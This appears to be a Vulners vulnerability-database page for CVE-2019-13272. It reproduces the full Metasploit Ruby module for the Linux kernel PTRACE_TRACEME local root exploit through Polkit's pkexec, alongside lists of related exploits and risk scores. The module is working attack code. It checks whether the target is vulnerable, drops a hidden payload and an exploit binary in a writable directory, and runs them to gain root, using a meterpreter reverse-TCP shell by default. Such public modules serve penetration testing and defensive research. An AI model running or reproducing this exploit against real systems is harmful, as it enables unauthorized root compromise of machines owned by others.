Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)

🗓️ 24 Oct 2019 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 1361 Views

Linux Polkit pkexec helper PTRACE_TRACEME local root exploit in Linux kernel before 5.1.17, allowing local root access

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME Exploit
17 Jul 201900:00
zdt
0day.today		Linux Kernel 4.10 < 5.1.17 - PTRACE_TRACEME pkexec Local Privilege Escalation Exploit
26 Jul 201900:00
zdt
0day.today		Linux Polkit pkexec Helper PTRACE_TRACEME Local Root Exploit
23 Oct 201900:00
zdt
0day.today		Linux PTRACE_TRACEME Local Root Exploit
26 Mar 202000:00
zdt
0day.today		Linux Kernel 5.1.x - (PTRACE_TRACEME) pkexec Local Privilege Escalation Exploit (2)
23 Nov 202100:00
zdt
GithubExploit		Exploit for CVE-2019-13272
31 Jul 201906:36
githubexploit
GithubExploit		Exploit for CVE-2019-13272
31 Jul 201904:51
githubexploit
GithubExploit		Exploit for CVE-2019-13272
7 Aug 201901:21
githubexploit
GithubExploit		Exploit for Race Condition in Canonical Ubuntu_Linux
4 Feb 202601:58
githubexploit
IBM Security Bulletins		Security Bulletin: Vyatta 5600 vRouter Software Patches - Release 1801-zb
11 Sep 201917:35
ibm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
      'Description'   => %q{
          This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
          kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
          not over an SSH session, as it requires execution from within the context of
          a user with an active Polkit agent.
          In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
          the recording of the credentials of a process that wants to create a ptrace
          relationship, which allows local users to obtain root access by leveraging
          certain scenarios with a parent-child process relationship, where a parent drops
          privileges and calls execve (potentially allowing control by an attacker). One
          contributing factor is an object lifetime issue (which can also cause a panic).
          Another contributing factor is incorrect marking of a ptrace relationship as
          privileged, which is exploitable through (for example) Polkit's pkexec helper
          with PTRACE_TRACEME.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
          'Jann Horn',    # Discovery and exploit
          'bcoles',       # Metasploit module
          'timwr',        # Metasploit module
      ],
      'References'     => [
          ['CVE', '2019-13272'],
          ['EDB', '47133'],
          ['PACKETSTORM', '153663'],
          ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
      ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X64 ],
      'Targets'        => [[ 'Auto', {} ]],
      'DefaultOptions' =>
        {
          'Payload'     => 'linux/x64/meterpreter/reverse_tcp',
          'PrependFork' => true,
        },
      'DisclosureDate' => 'Jul 4 2019'))
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def check
    # Introduced in 4.10, but also backported
    # Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17
    release = kernel_release
    v = Gem::Version.new release.split('-').first

    if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')
      vprint_error "Kernel version #{release} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Kernel version #{release} appears to be vulnerable"

    unless command_exists? 'pkexec'
      vprint_error 'pkexec is not installed'
      return CheckCode::Safe
    end
    vprint_good 'pkexec is installed'

    arch = kernel_hardware
    unless arch.include? 'x86_64'
      vprint_error "System architecture #{arch} is not supported"
      return CheckCode::Safe
    end
    vprint_good "System architecture #{arch} is supported"

    loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
    if loginctl_output =~ /Remote=yes/
      print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  def exploit
    if is_root? && !datastore['ForceExploit']
      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
    end

    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
    upload_and_chmodx(payload_file, generate_payload_exe)
    register_file_for_cleanup(payload_file)

    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit')
    end
    register_file_for_cleanup(exploit_file)

    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec("echo #{payload_file} | #{exploit_file}")
    print_status("Exploit result:\n#{result}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Oct 2019 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.2
CVSS 3.17.8
EPSS0.80379
SSVC
linuxpolkitptrace_tracemeexploitkernelvulnerablemetasploitcve-2019-13272
1361